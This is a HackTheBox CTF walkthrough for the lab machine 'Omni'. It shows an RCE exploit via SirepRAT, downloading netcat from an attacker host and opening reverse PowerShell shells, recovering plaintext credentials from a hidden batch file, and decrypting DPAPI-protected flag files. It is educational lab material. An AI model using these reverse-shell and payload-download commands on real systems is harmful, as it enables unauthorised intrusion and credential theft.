Omni HackTheBox WalkThrough
This is the Omni HackTheBox walkthrough. In this writeup I have demonstrated step by step how I rooted the Omni HTB machine. Before starting, let us know something about this machine. Its OS is not known, hence it is categorized as "other". Its maker rated its difficulty as easy, and it has been assigned the IP address 10.10.10.204.
First of all, connect your local machine to the VPN so that you can access the lab machines, and confirm connectivity by pinging the IP address 10.10.10.204. If everything is correct, start hacking.
As usual, I began by scanning the IP address so that I could get a starting point. Nmap [a port scanner] gave the following result.
Scanning
$ nmap -sV -sC -O -oN omni_scan 10.10.10.204
Nmap revealed that ports 135 and 8080 are open. Msrpc is running on port 135 and an IIS web server is running on 8080. Going to the URL http://10.10.10.204:8080/ I found a login page, like the one the Tomcat web server has, and a message which says Windows Device Portal.
Googling Windows Device Portal reveals that it is a web server through which you can manage and configure your IoT devices remotely using a web browser. It also provides advanced diagnostic tools to help you troubleshoot and view the real-time performance of your Windows device.
As I now had some information about the software being used, I immediately googled "Windows Device Portal exploit" to look for available public exploits for this software. I got this article on the first page of the search results. After reading it I came to know that the Windows IoT operating system is affected by an RCE vulnerability in which an attacker can exploit the Sirep/WPCon communications protocol to execute commands on the OS without dropping a payload onto it. For more information about the exploit and its usage you can refer to this GitHub repository.
We have the exploit; let us use it to confirm whether we have remote code execution or not.
Testing Exploit
$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git
$ cd SirepRAT/
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell.exe ipconfig" --v
We can clearly see that we can execute OS commands remotely. Therefore, to get a reverse shell I dropped a netcat binary into a publicly writable folder of the Windows OS and then executed a command to connect back to our machine. You can get a list of publicly writable folders from this repository.
Getting Shell
$ python3 -m http.server 80 # Start a python web server locally to host the nc64.exe file
$ rlwrap nc -nvlp 4321 # Local netcat listener for the reverse shell
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile C:\\Windows\\System32\\spool\\net1.exe -Uri http://10.10.14.86/nc64.exe" --v
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\net1.exe 10.10.14.86 4321 -e powershell.exe" --v
Note: If you use the C:\Windows\System32\spool\drivers\color\ directory to download your binary you may get an error that 'nc64.exe is being used by another program'. To avoid this error you can use the C:\Windows\System32\spool\ directory and rename the binary from nc64.exe to net1.exe while downloading it remotely. Alternatively, follow the commands as I have used them.
We got a shell. I confirmed it by running $env:UserName (I used $env because the whoami command is not present).
I tried to access the C:\Users\ directory to list the users on the box, but no user is present inside the Users folder. I used the command net user to list all the users we have.
$ net user
We have two users, Administrator and app. However, they are not present in their default directory. Maybe they are on some other drive? Let us check. I used the Get-PSDrive PowerShell command to list all the drives on the Omni machine.
For more info about the Omni machine you can run the PowerShell cmdlet Get-ComputerInfo.
$ Get-PSDrive
Get-PSDrive tells us that the Omni machine has three drives, namely C, D and U. I changed to the U drive and found the users app and administrator inside the directory U:\Users\. We can capture the user flag now.
$ type U:\Users\app\user.txt
It appears that the user flag is encrypted using a PowerShell function to prevent unauthorized access. I did not know how to decrypt it. I googled "PowerShell Password Decryption" and got this appropriate link on the first page. According to this website, user.txt can be decrypted using the following method.
$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt
$ $UserCreds.GetNetworkCredential().Password
When I tried to decrypt it, I got an error. This error is probably due to unauthorized access to the user.txt file, because user.txt is owned by user app and currently we are logged in as omni. So anyhow, we have to log in using user app's credentials, but currently we don't have any credentials for user app. After some enumeration I found the directory C:\Program Files\WindowsPowerShell\Modules\PackageManagement\, which contains a hidden file named r.bat. The content of r.bat can be accessed by using:
$ type 'C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat'
From the above file I got some credentials: app : mesh5143 and administrator : _1nt3rn37ofTh1nGz
Since we have a login panel at http://10.10.10.204:8080, let us use the credential app : mesh5143 to log in as user app.
Login into Portal
We are successfully logged in. Windows Device Portal (WDP) gives us the facility to manage all processes using a command prompt. We can run our command using the Run command panel.
Since we have already dropped our netcat binary [renamed to net1.exe] inside the directory C:\Windows\System32\Spool\, we will use this binary to get a reverse connection on our local netcat listener. As we are now logged in as user app, our reverse shell will have user app's privileges and we can easily decrypt the content of user.txt. So I ran the commands below to get a shell.
$ rlwrap nc -nvlp 2345
# Run it locally to get the reverse connection
$ C:\Windows\System32\spool\net1.exe 10.10.14.86 2345 -e powershell.exe
# Run it in the Run command window of WDP. You may get an error as below, but you will find your command is executed.
Capture User Flag
$ $UserCreds = Import-CliXml -Path U:\Users\app\user.txt
$ $UserCreds.GetNetworkCredential().Password
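Why the first decryption attempt failed from the omni shell and the second one worked as user app, as an added example that is not part of the original writeup: Export-Clixml stores a PSCredential's password as a SecureString protected with DPAPI in user scope, so Import-Clixml can only recover it under the same Windows account (on the same machine) that wrote the file. The sample password and temp path below are constructed for the demonstration; the function name is my own.

```powershell
# Added example, not from the original writeup: shows that Export-Clixml stores a
# credential's password as a DPAPI blob bound to the writing user, which is why
# Import-Clixml on user.txt only worked once we had a shell as user 'app'.
function Test-CliXmlCredentialRoundTrip {
    param(
        [string]$UserName = 'app',                                   # name only, as on the box
        [string]$Secret   = 'sample-password-123',                   # constructed sample value
        [string]$Path     = (Join-Path $env:TEMP 'clixml-demo.xml')  # constructed temp path
    )

    # Serialize the credential the same way a file like user.txt is produced.
    $Secure = ConvertTo-SecureString -String $Secret -AsPlainText -Force
    $Cred   = New-Object System.Management.Automation.PSCredential($UserName, $Secure)
    $Cred | Export-Clixml -Path $Path

    # On disk the password is an <SS> element holding a hex DPAPI blob, not plaintext.
    $Xml         = [xml](Get-Content -Path $Path -Raw)
    $Blob        = $Xml.Objs.Obj.Props.SS.'#text'
    $IsProtected = ($Blob -match '^[0-9a-fA-F]+$') -and ($Blob -notlike "*$Secret*")

    # Import-Clixml calls DPAPI in user scope: it succeeds under the account that
    # wrote the file and fails ("Key not valid for use in specified state") under
    # any other account, which is the error seen from the first shell.
    try {
        $Back      = Import-Clixml -Path $Path
        $RoundTrip = ($Back.GetNetworkCredential().Password -eq $Secret)
        $Failure   = $null
    }
    catch {
        $RoundTrip = $false
        $Failure   = $_.Exception.Message
    }
    finally {
        Remove-Item -Path $Path -ErrorAction SilentlyContinue
    }

    [pscustomobject]@{
        StoredAsDpapiBlob = $IsProtected   # expected: True
        DecryptedAsOwner  = $RoundTrip     # True only under the account that ran Export-Clixml
        DecryptError      = $Failure       # DPAPI error text when run under another account
    }
}

Test-CliXmlCredentialRoundTrip
```

Running the function once as the account that wrote the file and once as a different account (for example via a second session under another user) shows the two outcomes; the second account can read the file from disk but gets DecryptedAsOwner = False with the DPAPI error message.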
Privilege Escalation
We also have the administrator account credentials from the r.bat file. We just need to log out from the user app account, log in as user administrator and follow the same steps as we did with user app. To log out from the user app account, just close the browser window and clear your browsing history to remove the logged-in cookie. Then log in using the credentials administrator : _1nt3rn37ofTh1nGz and execute the same command as you did with user app, changing the listening port of netcat.
$ rlwrap nc -nvlp 3456
$ C:\Windows\System32\spool\net1.exe 10.10.14.86 3456 -e powershell.exe
We got an administrator-privileged shell, so we have successfully escalated privileges to the admin user.
Capture Root Flag
$ $UserCreds = Import-CliXml -Path U:\Users\administrator\root.txt
$ $UserCreds.GetNetworkCredential().Password
This was how I rooted Omni HackTheBox. I learnt a lot after hunting this box. I hope you guys have also learnt something new from this box. Thanks for reading this writeup. For any query or suggestion related to the walkthrough, feel free to contact us at [email protected].